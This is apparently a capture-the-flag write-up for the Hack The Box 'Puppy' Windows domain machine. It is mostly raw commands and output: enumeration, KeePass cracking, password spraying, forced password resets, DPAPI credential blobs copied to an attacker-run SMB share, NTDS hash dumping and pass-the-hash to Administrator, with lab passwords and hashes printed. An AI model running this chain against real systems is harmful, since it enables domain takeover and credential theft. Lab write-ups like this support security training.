🐶 Puppy
https://app.hackthebox.com/machines/Puppy

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!


[*] Running initial Nmap scan..
sudo nmap -sCV -T4 <ip> -oA nmap-initial
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 10:15 CEST
Nmap scan report for puppy.htb
Host is up (0.018s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 15:15:11Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

➜ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --users
[..]
SMB <machineip> 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB <machineip> 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB <machineip> 445 DC [+] Enumerated domain user(s)
SMB <machineip> 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB <machineip> 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB <machineip> 445 DC PUPPY.HTB\levi.james badpwdcount: 5 desc:
SMB <machineip> 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB <machineip> 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB <machineip> 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
➜ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
➜ cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateResolvConf = false
nameserver <machineip>
nameserver 10.255.255.254
search localdomain
➜ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 04S
➜ sudo crackmapexec smb <ip> -u levi.james -p 'KingofAkron2025!' --shares
SMB 10.129.253.192 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.129.253.192 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.129.253.192 445 DC [+] Enumerated shares
SMB 10.129.253.192 445 DC Share Permissions Remark
SMB 10.129.253.192 445 DC ----- ----------- ------
SMB 10.129.253.192 445 DC ADMIN$ Remote Admin
SMB 10.129.253.192 445 DC C$ Default share
SMB 10.129.253.192 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB 10.129.253.192 445 DC IPC$ READ Remote IPC
SMB 10.129.253.192 445 DC NETLOGON READ Logon server share
SMB 10.129.253.192 445 DC SYSVOL READ Logon server share
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

ldapmodify -x -H ldap://<ip> -D "levi.james@puppy.htb" -w 'KingofAkron2025!' -f modify.ldif

smbclient //10.10.11.70/dev -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 08:07:57 2025
.. D 0 Sat Mar 8 17:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 08:09:12 2025
Projects D 0 Sat Mar 8 17:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 03:25:46 2025
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (31.5 KiloBytes/sec) (average 31.5 KiloBytes/sec)
➜ puppy sudo apt-get install keepassxc
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
[..]
➜ git clone https://github.com/r3nt0n/keepass4brute
Cloning into 'keepass4brute'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 10), reused 9 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 18.26 KiB | 2.28 MiB/s, done.
Resolving deltas: 100% (10/10), done.
➜ ./keepass4brute/keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 36/14344392 - Attempts per minute: 144 - Estimated time remaining: 9 weeks, 6 days
[+] Current attempt: liverpool
[*] Password found: liverpool

➜ cat user.txt
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
➜ cat passes
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!

➜ crackmapexec smb <ip> -u user.txt -p passes
[..]
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
➜ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_edwards.json -ns <ip>

➜ rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' <ip>
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987

➜ nxc smb <ip> -u 'ADAM.SILVER' -p 'Password@987'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ADAM.SILVER:Password@987 STATUS_ACCOUNT_DISABLED

➜ bloodyAD --host dc.puppy.htb -d puppy.htb -u ant.edwards -p Antman2025! remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from ADAM.SILVER's userAccountControl
➜ evil-winrm -i <ip> -u adam.silver -p Password@987
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/9/2025 10:48 AM Backups
d----- 5/12/2025 5:21 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 4/4/2025 3:40 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d----- 3/8/2025 9:00 AM StorageReports
d-r--- 3/8/2025 8:52 AM Users
d----- 5/13/2025 4:40 PM Windows
*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> dir
Directory: C:\Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip
Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
nms-auth-config.xml.bak

➜ evil-winrm -i 10.10.11.70 -u steph.cooper -p ChefSteph2025!
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents>

➜ mkdir -p share
➜ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy "C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" "\\<ip>\share\masterkey_blob"
*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> dir -h
Directory: C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\Appdata\Roaming\Microsoft\Credentials> copy C8D69EBE9A43E9DEBF6B5FBD48B521B9 "\\<ip>\share\credential_blob"
➜ python3 /usr/share/doc/python3-impacket/examples/dpapi.py masterkey -f masterkey_blob -password ChefSteph2025! -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
➜ python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

➜ impacket-secretsdump PUPPY.HTB/steph.cooper_adm:'FivethChipOnItsWay2025!'@puppy.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
####[Below is the Admin hash we need]#######
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8::
[...]

➜ evil-winrm -i puppy.htb -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/24/2025 5:15 PM 34 root.txt